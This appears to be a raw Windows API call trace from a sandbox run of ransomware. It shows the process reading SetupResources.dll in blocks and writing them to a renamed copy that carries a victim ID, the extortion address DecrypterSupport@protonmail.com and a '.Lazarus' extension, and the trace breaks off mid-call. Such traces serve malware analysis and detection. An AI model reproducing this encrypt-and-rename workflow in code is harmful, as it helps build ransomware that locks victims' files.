[0062.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0062.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.536] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.537] GetFileType (hFile=0x420) returned 0x1 [0062.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0062.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.537] GetLastError () returned 0xb7 [0062.537] SetLastError (dwErrCode=0xb7) [0062.537] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0062.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.538] CloseHandle (hObject=0x420) returned 1 [0062.539] AreFileApisANSI () returned 1 [0062.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0062.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.539] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0062.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.540] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0062.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.541] AreFileApisANSI () returned 1 [0062.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0062.541] AreFileApisANSI () returned 1 [0062.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0062.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.542] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.542] GetFileType (hFile=0x420) returned 0x1 [0062.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.542] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0062.542] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0062.542] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0062.542] CloseHandle (hObject=0x420) returned 1 [0062.542] AreFileApisANSI () returned 1 [0062.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0062.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.543] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.543] GetFileType (hFile=0x420) returned 0x1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0062.543] CloseHandle (hObject=0x420) returned 1 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.544] AreFileApisANSI () returned 1 [0062.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0062.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.544] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0062.544] AreFileApisANSI () returned 1 [0062.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0062.544] GetLastError () returned 0x0 [0062.544] SetLastError (dwErrCode=0x0) [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0062.544] GetLastError () returned 0x0 [0062.544] SetLastError (dwErrCode=0x0) [0062.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71620 [0062.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0062.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0062.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.545] AreFileApisANSI () returned 1 [0062.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0062.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0062.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0062.545] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.549] GetFileType (hFile=0x420) returned 0x1 [0062.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0062.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0062.549] AreFileApisANSI () returned 1 [0062.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0062.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.549] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.549] GetFileType (hFile=0x428) returned 0x1 [0062.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0062.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.550] GetLastError () returned 0x0 [0062.550] SetLastError (dwErrCode=0x0) [0062.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.550] GetLastError () returned 0x0 [0062.550] SetLastError (dwErrCode=0x0) [0062.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0062.550] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0062.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0062.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0062.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0062.595] GetLastError () returned 0x0 [0062.595] SetLastError (dwErrCode=0x0) [0062.595] GetLastError () returned 0x0 [0062.595] SetLastError (dwErrCode=0x0) [0062.595] GetLastError () returned 0x0 [0062.595] SetLastError (dwErrCode=0x0) [0062.595] GetLastError () returned 0x0 [0062.595] SetLastError (dwErrCode=0x0) [0062.595] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.600] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.603] GetLastError () returned 0x0 [0062.603] SetLastError (dwErrCode=0x0) [0062.603] GetLastError () returned 0x0 [0062.603] SetLastError (dwErrCode=0x0) [0062.603] GetLastError () returned 0x0 [0062.603] SetLastError (dwErrCode=0x0) [0062.604] GetLastError () returned 0x0 [0062.604] SetLastError (dwErrCode=0x0) [0062.604] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.604] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetLastError (dwErrCode=0x0) [0062.604] GetLastError () returned 0x0 [0062.604] SetLastError (dwErrCode=0x0) [0062.604] GetLastError () returned 0x0 [0062.604] SetLastError (dwErrCode=0x0) [0062.604] GetLastError () returned 0x0 [0062.605] SetLastError (dwErrCode=0x0) [0062.605] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.605] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.605] GetLastError () returned 0x0 [0062.605] SetLastError (dwErrCode=0x0) [0062.605] GetLastError () returned 0x0 [0062.605] SetLastError (dwErrCode=0x0) [0062.605] GetLastError () returned 0x0 [0062.605] SetLastError (dwErrCode=0x0) [0062.605] GetLastError () returned 0x0 [0062.605] SetLastError (dwErrCode=0x0) [0062.606] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x958, lpOverlapped=0x0) returned 1 [0062.606] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 